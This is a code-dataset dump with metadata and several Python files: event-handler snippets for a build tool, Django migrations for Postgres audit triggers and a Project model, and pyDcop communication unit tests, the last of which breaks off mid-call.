Dataset schema (column: type, min..max):

hexsha: stringlengths 40..40 | size: int64 5..2.06M | ext: stringclasses 10 values | lang: stringclasses 1 value
max_stars_repo_path: stringlengths 3..248 | max_stars_repo_name: stringlengths 5..125 | max_stars_repo_head_hexsha: stringlengths 40..78 | max_stars_repo_licenses: listlengths 1..10 | max_stars_count: int64 1..191k ⌀ | max_stars_repo_stars_event_min_datetime: stringlengths 24..24 ⌀ | max_stars_repo_stars_event_max_datetime: stringlengths 24..24 ⌀
max_issues_repo_path: stringlengths 3..248 | max_issues_repo_name: stringlengths 5..125 | max_issues_repo_head_hexsha: stringlengths 40..78 | max_issues_repo_licenses: listlengths 1..10 | max_issues_count: int64 1..67k ⌀ | max_issues_repo_issues_event_min_datetime: stringlengths 24..24 ⌀ | max_issues_repo_issues_event_max_datetime: stringlengths 24..24 ⌀
max_forks_repo_path: stringlengths 3..248 | max_forks_repo_name: stringlengths 5..125 | max_forks_repo_head_hexsha: stringlengths 40..78 | max_forks_repo_licenses: listlengths 1..10 | max_forks_count: int64 1..105k ⌀ | max_forks_repo_forks_event_min_datetime: stringlengths 24..24 ⌀ | max_forks_repo_forks_event_max_datetime: stringlengths 24..24 ⌀
content: stringlengths 5..2.06M | avg_line_length: float64 1..1.02M | max_line_length: int64 3..1.03M | alphanum_fraction: float64 0..1
count_classes: int64 0..1.6M | score_classes: float64 0..1 | count_generators: int64 0..651k | score_generators: float64 0..1 | count_decorators: int64 0..990k | score_decorators: float64 0..1 | count_async_functions: int64 0..235k | score_async_functions: float64 0..1 | count_documentation: int64 0..1.04M | score_documentation: float64 0..1

hexsha: af16e083f971bbc4e21d58523158391bc67070fb | size: 7,669 | ext: py | lang: Python
max_stars_repo_path: pwbs/tests/TTTTTT_test_6.py | max_stars_repo_name: paip-web/pwbs | max_stars_repo_head_hexsha: 21622712b6975ab68b7f5d7c1a944fa826ea87ba | max_stars_repo_licenses: ["MIT"] | max_stars_count: 2 | max_stars_repo_stars_event_min_datetime: 2020-01-07T16:07:56.000Z | max_stars_repo_stars_event_max_datetime: 2020-02-15T05:57:58.000Z
max_issues_repo_path: pwbs/tests/TTTTTT_test_6.py | max_issues_repo_name: paip-web/pwbs | max_issues_repo_head_hexsha: 21622712b6975ab68b7f5d7c1a944fa826ea87ba | max_issues_repo_licenses: ["MIT"] | max_issues_count: 3 | max_issues_repo_issues_event_min_datetime: 2020-07-03T21:28:02.000Z | max_issues_repo_issues_event_max_datetime: 2021-06-25T15:29:18.000Z
max_forks_repo_path: pwbs/tests/TTTTTT_test_6.py | max_forks_repo_name: paip-web/pwbs | max_forks_repo_head_hexsha: 21622712b6975ab68b7f5d7c1a944fa826ea87ba | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2020-02-15T06:00:08.000Z | max_forks_repo_forks_event_max_datetime: 2020-02-15T06:00:08.000Z
content:
"""
This for future test of Event Manager.
For now it's just contain snippets for it.
"""
test(PWBS_EM)
def test(PWBS_EM: PWBSEventManager):
funct = lambda event_name, *args, **kwargs: print("{0}: {1} | {2}".format(event_name, args, kwargs))
# PWBS Event Called in pwbs.__init__.main() when PWBS class is initialized
PWBS_EM.addHandler("pwbs-event--pwbs_class-initialized", funct)
# PWBS Event Called in pwbs.__init__.main() before PWBS.main() is called
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-main", funct)
# PWBS Event Called in pwbs.__init__.main() after PWBS.main() is called (before quit)
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-main", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after argparser being initialized
PWBS_EM.addHandler("pwbs-event--pwbs_class-argparser-initilized", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ before parser_initializer being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-parser_initializer", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after parser_initializer being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-parser_initializer", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after specialtasks group is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-specialtasks-groupcreated-start", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after specialtasks group has added all PWBS special tasks
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-specialtasks-groupcreated-end", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.parser_initializer after localconfigtasks group is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-parser_initializer-localconfigtasks-groupcreated", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ before PWBS Config Manager is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-before-configmanager-created", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ after PWBS Config Manager is created
PWBS_EM.addHandler("pwbs-event--pwbs_class-after-configmanager-created", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.__init__ in "Try for errors" block if there are errors
PWBS_EM.addHandler("pwbs-event--pwbs_class-configmanager-errored", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.localconfig_parser_initializer at start of function
PWBS_EM.addHandler("pwbs-event--pwbs_class-localconfig_parser_initilizer-started", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.localconfig_parser_initializer on every element in CommandList object from Configuration Manager
PWBS_EM.addHandler("pwbs-event--pwbs_class-localconfig_parser_initilizer-command-listitem", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before argparser.parse_args()
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-parseargs", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after argparser.parse_args()
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-parseargs", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before special_tasks_interpreter being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-specialtaskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after special_tasks_interpreter being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-specialtaskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main before task_runner being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-before-taskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main after task_runner being called
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-after-taskinterpreter", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.main on throwing NotImplementedError
PWBS_EM.addHandler("pwbs-event--pwbs_class-main-notimplementedfeatureerror", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before verbose Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-verbose", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before debug Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-debug", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before version Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-version", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before log Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-log", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before logfile Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-logfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before configfile Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-configfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before test_mode Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-test_mode", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter before run_tests Special Task
PWBS_EM.addHandler("pwbs-event--before-specialtask-run_tests", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after verbose Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-verbose", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after debug Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-debug", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after version Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-version", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after log Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-log", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after logfile Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-logfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after configfile Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-configfile", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after test_mode Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-test_mode", funct)
# PWBS Event Called in pwbs.pwbs_class.PWBS.special_tasks_interpreter after run_tests Special Task
PWBS_EM.addHandler("pwbs-event--after-specialtask-run_tests", funct)
# PWBS Event Called on start of PWBS
PWBS_EM.addHandler("pwbs-event--start", funct)
# PWBS Event Called on exit of PWBS
PWBS_EM.addHandler("pwbs-event--quit", funct)
# PWBS Event Called in test_runner on start of run_test function
PWBS_EM.addHandler("pwbs-event--test-runner--start-run_test", funct)
# PWBS Event Called in test_runner on run test function
PWBS_EM.addHandler("pwbs-event--test-runner--run-test-function", funct)
# PWBS Event Called in test_runner on end of run_test function
PWBS_EM.addHandler("pwbs-event--test-runner--end-run_test", funct)
# PWBS Event Called in test_runner before test
PWBS_EM.addHandler("pwbs-event--test-runner--before-test", funct)
# PWBS Event Called in test_runner after test
PWBS_EM.addHandler("pwbs-event--test-runner--after-test", funct)
avg_line_length: 78.255102 | max_line_length: 144 | alphanum_fraction: 0.784978 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 5,899 | score_documentation: 0.769201

hexsha: af1703462ef77f78c9cf88e812154fcfc28474a9 | size: 2,318 | ext: py | lang: Python
max_stars_repo_path: postgres_audit_triggers/operations.py | max_stars_repo_name: carta/postgres_audit_triggers | max_stars_repo_head_hexsha: fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c | max_stars_repo_licenses: ["MIT"] | max_stars_count: 23 | max_stars_repo_stars_event_min_datetime: 2018-03-26T11:18:03.000Z | max_stars_repo_stars_event_max_datetime: 2020-12-28T05:11:04.000Z
max_issues_repo_path: postgres_audit_triggers/operations.py | max_issues_repo_name: carta/postgres_audit_triggers | max_issues_repo_head_hexsha: fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c | max_issues_repo_licenses: ["MIT"] | max_issues_count: 1 | max_issues_repo_issues_event_min_datetime: 2019-02-13T23:58:53.000Z | max_issues_repo_issues_event_max_datetime: 2020-07-01T18:16:13.000Z
max_forks_repo_path: postgres_audit_triggers/operations.py | max_forks_repo_name: carta/postgres_audit_triggers | max_forks_repo_head_hexsha: fece63c5ad2924ff5e2aeb38d7bbd5bee6e6547c | max_forks_repo_licenses: ["MIT"] | max_forks_count: 3 | max_forks_repo_forks_event_min_datetime: 2019-03-26T15:50:38.000Z | max_forks_repo_forks_event_max_datetime: 2021-03-05T00:27:53.000Z
content:
from django.db.migrations.operations.base import Operation
from django.utils.functional import cached_property
__all__ = (
    'AddAuditTrigger',
    'RemoveAuditTrigger',
)


class AddAuditTrigger(Operation):
    reduces_to_sql = True
    reversible = True
    option_name = 'audit_trigger'
    enabled = True

    def __init__(self, model_name):
        self.name = model_name

    @cached_property
    def model_name_lower(self):
        return self.name.lower()

    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.model_name_lower]
        model_state.options[self.option_name] = self.enabled
        state.reload_model(app_label, self.model_name_lower, delay=True)

    def database_forwards(
        self, app_label, schema_editor, from_state, to_state,
    ):
        model = to_state.apps.get_model(app_label, self.name)
        table = model._meta.db_table
        with schema_editor.connection.cursor() as cursor:
            cursor.execute('SELECT to_regclass(\'audit.logged_actions\')')
            has_audit = cursor.fetchone()[0]
        if has_audit:
            schema_editor.execute(
                'SELECT audit.audit_table(\'{}\')'.format(table),
            )

    def database_backwards(
        self, app_label, schema_editor, from_state, to_state,
    ):
        model = to_state.apps.get_model(app_label, self.name)
        table = model._meta.db_table
        schema_editor.execute(
            'DROP TRIGGER IF EXISTS audit_trigger_row ON {}'.format(table),
        )
        schema_editor.execute(
            'DROP TRIGGER IF EXISTS audit_trigger_stm ON {}'.format(table),
        )

    def describe(self):
        return 'Add audit triggers on model {}'.format(self.name)


class RemoveAuditTrigger(AddAuditTrigger):
    enabled = False

    def database_forwards(
        self, app_label, schema_editor, from_state, to_state,
    ):
        super().database_backwards(
            app_label, schema_editor, from_state, to_state,
        )

    def database_backwards(
        self, app_label, schema_editor, from_state, to_state,
    ):
        super().database_forwards(
            app_label, schema_editor, from_state, to_state,
        )

    def describe(self):
        return 'Remove audit triggers on model {}'.format(self.name)
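
# --- Illustrative sketch (not part of the original file) ----------------------
# These Operation subclasses are meant to be listed in a migration's ``operations``;
# the app label, dependency and model name below are hypothetical.
#
#   from django.db import migrations
#
#   class Migration(migrations.Migration):
#       dependencies = [('billing', '0001_initial')]       # hypothetical dependency
#       operations = [
#           AddAuditTrigger('invoice'),     # enable audit triggers on billing.Invoice
#           # RemoveAuditTrigger('invoice') would drop them again in a later migration
#       ]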
avg_line_length: 30.103896 | max_line_length: 75 | alphanum_fraction: 0.654875 | count_classes: 2,136 | score_classes: 0.921484 | count_generators: 0 | score_generators: 0 | count_decorators: 81 | score_decorators: 0.034944 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 295 | score_documentation: 0.127265

hexsha: af18b963242e252b6522312070b2c7035181de3d | size: 3,781 | ext: py | lang: Python
max_stars_repo_path: aether-ui/aether/ui/api/migrations/0005_project.py | max_stars_repo_name: eHealthAfrica/aether | max_stars_repo_head_hexsha: 6845d7eeebd4ae57332f73d74db3617e00032204 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 14 | max_stars_repo_stars_event_min_datetime: 2018-08-09T20:57:16.000Z | max_stars_repo_stars_event_max_datetime: 2020-10-11T12:22:18.000Z
max_issues_repo_path: aether-ui/aether/ui/api/migrations/0005_project.py | max_issues_repo_name: eHealthAfrica/aether | max_issues_repo_head_hexsha: 6845d7eeebd4ae57332f73d74db3617e00032204 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 148 | max_issues_repo_issues_event_min_datetime: 2018-07-24T10:52:29.000Z | max_issues_repo_issues_event_max_datetime: 2022-02-10T09:06:44.000Z
max_forks_repo_path: aether-ui/aether/ui/api/migrations/0005_project.py | max_forks_repo_name: eHealthAfrica/aether | max_forks_repo_head_hexsha: 6845d7eeebd4ae57332f73d74db3617e00032204 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 6 | max_forks_repo_forks_event_min_datetime: 2018-07-25T13:33:10.000Z | max_forks_repo_forks_event_max_datetime: 2019-09-23T03:02:09.000Z
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-02-21 09:42
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import uuid
def migrate_create_projects(apps, schema_editor):
Project = apps.get_model('ui', 'Project')
Pipeline = apps.get_model('ui', 'Pipeline')
# create default project for all pipelines without any (not published yet)
default_project = Project.objects.create(name=settings.DEFAULT_PROJECT_NAME, is_default=True)
for pipeline in Pipeline.objects.all():
pipeline.project = default_project # set the default project
# create project based on pipeline contracts (extract project ID from kernel_refs)
for contract in pipeline.contracts.all():
if contract.kernel_refs and contract.kernel_refs.get('project'):
project_id = contract.kernel_refs.get('project')
project, created = Project.objects.get_or_create(project_id=project_id)
if created:
project.name = pipeline.name
project.save()
pipeline.project = project
break # ASSUMPTION: all contracts are linked to the same project
pipeline.save()
class Migration(migrations.Migration):
dependencies = [
('ui', '0004_rename_mapping_to_mapping_rules'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('project_id', models.UUIDField(default=uuid.uuid4, help_text='This ID corresponds to an Aether Kernel project ID.', primary_key=True, serialize=False, verbose_name='project ID')),
('name', models.TextField(blank=True, default='', null=True, verbose_name='name')),
('is_default', models.BooleanField(default=False, editable=False, verbose_name='is the default project?')),
],
options={
'verbose_name': 'project',
'verbose_name_plural': 'projects',
'ordering': ['name'],
'default_related_name': 'projects',
},
),
migrations.AddField(
model_name='pipeline',
name='project',
field=models.ForeignKey(null=True, blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='pipelines', to='ui.Project', verbose_name='project'),
preserve_default=False,
),
migrations.RunPython(
code=migrate_create_projects,
reverse_code=migrations.RunPython.noop,
# The optional elidable argument determines whether or not the operation
# will be removed (elided) when squashing migrations.
elidable=True,
),
migrations.AlterField(
model_name='pipeline',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pipelines', to='ui.Project', verbose_name='project'),
),
migrations.AddIndex(
model_name='pipeline',
index=models.Index(fields=['project', '-modified'], name='ui_pipeline_project_2fab7e_idx'),
),
migrations.AddIndex(
model_name='pipeline',
index=models.Index(fields=['-modified'], name='ui_pipeline_modifie_e896fc_idx'),
),
]
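
# Note: reverse_code=migrations.RunPython.noop (used above) makes the data step a
# no-op when migrating backwards, so the surrounding schema changes can still be
# reversed without trying to "un-create" the default project.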
avg_line_length: 41.097826 | max_line_length: 196 | alphanum_fraction: 0.638191 | count_classes: 2,415 | score_classes: 0.63872 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,017 | score_documentation: 0.268976

hexsha: af190a09ca44bce44b5b0163ba1e2eceb805790a | size: 18,922 | ext: py | lang: Python
max_stars_repo_path: tests/unit/test_infra_communication.py | max_stars_repo_name: gauthier-emse/pyDcop | max_stars_repo_head_hexsha: a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: 28 | max_stars_repo_stars_event_min_datetime: 2018-05-18T10:25:58.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-05T16:24:15.000Z
max_issues_repo_path: tests/unit/test_infra_communication.py | max_issues_repo_name: gauthier-emse/pyDcop | max_issues_repo_head_hexsha: a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: 19 | max_issues_repo_issues_event_min_datetime: 2018-09-21T21:50:15.000Z | max_issues_repo_issues_event_max_datetime: 2022-02-22T20:23:32.000Z
max_forks_repo_path: tests/unit/test_infra_communication.py | max_forks_repo_name: gauthier-emse/pyDcop | max_forks_repo_head_hexsha: a51cc3f7d8ef9ee1f863beeca4ad60490862d2ed | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: 17 | max_forks_repo_forks_event_min_datetime: 2018-05-29T19:54:07.000Z | max_forks_repo_forks_event_max_datetime: 2022-02-22T20:14:46.000Z
content:
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import unittest
from http.server import HTTPServer
from threading import Thread
from time import sleep
from unittest.mock import MagicMock, create_autospec, call, ANY
import pytest
import requests
from pydcop.infrastructure.communication import Messaging, \
InProcessCommunicationLayer, \
MPCHttpHandler, HttpCommunicationLayer, ComputationMessage, \
UnreachableAgent, MSG_MGT, UnknownAgent, UnknownComputation, MSG_ALGO
from pydcop.infrastructure.computations import Message
from pydcop.infrastructure.discovery import Discovery
def skip_http_tests():
import os
try:
return os.environ['HTTP_TESTS'] == 'NO'
except KeyError:
return False
@pytest.fixture
def local_messaging():
comm = InProcessCommunicationLayer()
comm.discovery = Discovery('a1', 'addr1')
messaging = Messaging('a1', comm)
return messaging
class TestMessaging(object):
def test_messaging_local_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
msg = MagicMock()
local_messaging.post_msg('c1', 'c2', msg)
(src, dest, o_msg, type), t = local_messaging.next_msg()
assert o_msg == msg
assert dest == 'c2'
assert src == 'c1'
def test_retry_when_posting_msg_to_unknown_computation(
self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.post_msg('c1', 'c2', 'a msg')
# c2 is unknown, the message should not be in the queue
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
# Register c2 : the message will now be delivered to the queue
local_messaging.discovery.register_computation('c2', 'a1')
(src, dest, full_msg, type), _ = local_messaging.next_msg()
assert full_msg == 'a msg'
def test_raise_when_posting_msg_from_unknown_computation(
self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
# Attempt to send a message to c2, from c3 which is not hosted locally
with pytest.raises(UnknownComputation):
local_messaging.post_msg('c3', 'c2', 'a msg')
def test_next_message_returns_None_when_no_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
def test_msg_to_computation_hosted_on_another_agent(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
local_messaging.post_msg('c1', 'c2', msg)
# Check that the msg was passed to the communication layer
local_messaging._comm.send_msg.assert_called_with(
'a1', 'a2',
ComputationMessage('c1', 'c2', msg, ANY),
on_error=ANY)
# Check it's not in the local queue
full_msg, _ = local_messaging.next_msg()
assert full_msg is None
def test__metrics_local_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
local_messaging.discovery.register_computation('c3', 'a1')
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
msg2 = MagicMock()
msg2.size = 12
local_messaging.post_msg('c1', 'c3', msg2)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
def test__metrics_ext_msg(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a2', 'addr2')
local_messaging.discovery.register_computation('c3', 'a1')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg)
assert local_messaging.size_ext_msg['c1'] == 42
assert local_messaging.count_ext_msg['c1'] == 1
assert local_messaging.count_all_ext_msg == 1
assert local_messaging.size_all_ext_msg == 42
msg2, msg3 = MagicMock(), MagicMock()
msg2.size, msg3.size = 12, 5
local_messaging.post_msg('c1', 'c2', msg2)
local_messaging.post_msg('c1', 'c3', msg3)
assert local_messaging.size_ext_msg['c1'] == 12 + 42
assert local_messaging.count_ext_msg['c1'] == 2
assert local_messaging.count_all_ext_msg == 2
assert local_messaging.size_all_ext_msg == 42 + 12
def test_do_not_count_mgt_messages(self, local_messaging):
local_messaging.discovery.register_computation('c1', 'a1')
local_messaging.discovery.register_computation('c2', 'a1')
local_messaging._comm.send_msg = MagicMock()
msg = MagicMock()
msg.size = 42
local_messaging.post_msg('c1', 'c2', msg, msg_type=MSG_MGT)
assert local_messaging.count_all_ext_msg == 0
assert local_messaging.size_all_ext_msg == 0
class TestInProcessCommunictionLayer(object):
def test_address(self):
# for in-process, the address is the object it-self
comm1 = InProcessCommunicationLayer()
assert comm1.address == comm1
def test_addresses_are_not_shared_accross_instances(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', 'addr1')
comm2 = InProcessCommunicationLayer()
comm2.discovery = Discovery('a2', 'addr2')
comm1.discovery.register_agent('a1', comm1)
with pytest.raises(UnknownAgent):
comm2.discovery.agent_address('a1')
def test_msg_to_another_agent(self):
comm1 = InProcessCommunicationLayer()
Messaging('a1', comm1)
comm1.discovery = Discovery('a1', comm1)
comm2 = InProcessCommunicationLayer()
Messaging('a2', comm2)
comm2.discovery = Discovery('a2', comm2)
comm2.receive_msg = MagicMock()
comm1.discovery.register_agent('a2', comm2)
full_msg = ('c1', 'c2', 'msg')
comm1.send_msg('a1', 'a2', full_msg)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
def test_received_msg_is_delivered_to_messaging_queue(self):
comm1 = InProcessCommunicationLayer()
Messaging('a1', comm1)
comm1.messaging.post_msg = MagicMock()
comm1.receive_msg('a2', 'a1', ('c2', 'c1', 'msg', MSG_MGT))
comm1.messaging.post_msg.assert_called_with('c2', 'c1', 'msg', 10)
def test_raise_when_sending_to_unknown_agent_fail_default(self):
comm1 = InProcessCommunicationLayer(on_error='fail')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg', MSG_MGT)
with pytest.raises(UnknownAgent):
comm1.send_msg('a1', 'a2', full_msg)
def test_raise_when_sending_to_unknown_agent_fail_on_send(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
with pytest.raises(UnknownAgent):
comm1.send_msg('a1', 'a2', full_msg, on_error='fail')
def test_ignore_when_sending_to_unknown_agent_ignore_default(self):
comm1 = InProcessCommunicationLayer(on_error='ignore')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg', MSG_MGT)
assert comm1.send_msg('a1', 'a2', full_msg)
def test_ignore_when_sending_to_unknown_agent_ignore_on_send(self):
comm1 = InProcessCommunicationLayer()
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert comm1.send_msg('a1', 'a2', full_msg,on_error='ignore')
@pytest.mark.skip
def test_retry_when_sending_to_unknown_agent_retry_default(self):
comm1 = InProcessCommunicationLayer(on_error='retry')
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert not comm1.send_msg('a1', 'a2', full_msg)
comm2 = create_autospec(InProcessCommunicationLayer)
comm1.discovery.register_agent('a2', comm2)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
@pytest.mark.skip
def test_retry_when_sending_to_unknown_agent_retry_on_send(self):
comm1 = InProcessCommunicationLayer(None)
comm1.discovery = Discovery('a1', comm1)
full_msg = ('c1', 'c2', 'msg')
assert not comm1.send_msg('a1', 'a2', full_msg,on_error='retry')
comm2 = create_autospec(InProcessCommunicationLayer)
comm1.discovery.register_agent('a2', comm2)
comm2.receive_msg.assert_called_with('a1', 'a2', full_msg)
@pytest.fixture
def httpd():
server_address = ('127.0.0.1', 8001)
httpd = HTTPServer(server_address, MPCHttpHandler)
httpd.comm = MagicMock()
yield httpd
httpd.shutdown()
httpd.server_close()
class TestHttpHandler(object):
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_http_handler_one_message(self, httpd):
t = Thread(name='http_thread',
target=httpd.serve_forever)
t.start()
requests.post('http://127.0.0.1:8001/test',
json={'key': 'value'},
timeout=0.5)
sleep(0.5)
httpd.comm.on_post_message.assert_called_once_with(
'/test', None, None,
ComputationMessage(
src_comp=None,dest_comp=None,msg={'key': 'value'},
msg_type=MSG_ALGO))
@pytest.mark.skipif(skip_http_tests(), reason='HTTP_TESTS == NO')
def test_http_handler_several_messages(self, httpd):
t = Thread(name='http_thread',
target=httpd.serve_forever)
t.start()
requests.post('http://127.0.0.1:8001/test',
json={'key':'value'},
timeout=0.5)
requests.post('http://127.0.0.1:8001/test2',
headers={'sender-agent': 'zero'},
json={'key':'value2'},
timeout=0.5)
requests.post('http://127.0.0.1:8001/test3',
headers={'sender-agent': 'sender',
'dest-agent': 'dest',
'type': '15'},
json={'key':'value3'},
timeout=0.5)
sleep(0.5)
httpd.comm.on_post_message.assert_has_calls([
call('/test', None, None,
ComputationMessage(src_comp=None,
dest_comp=None,
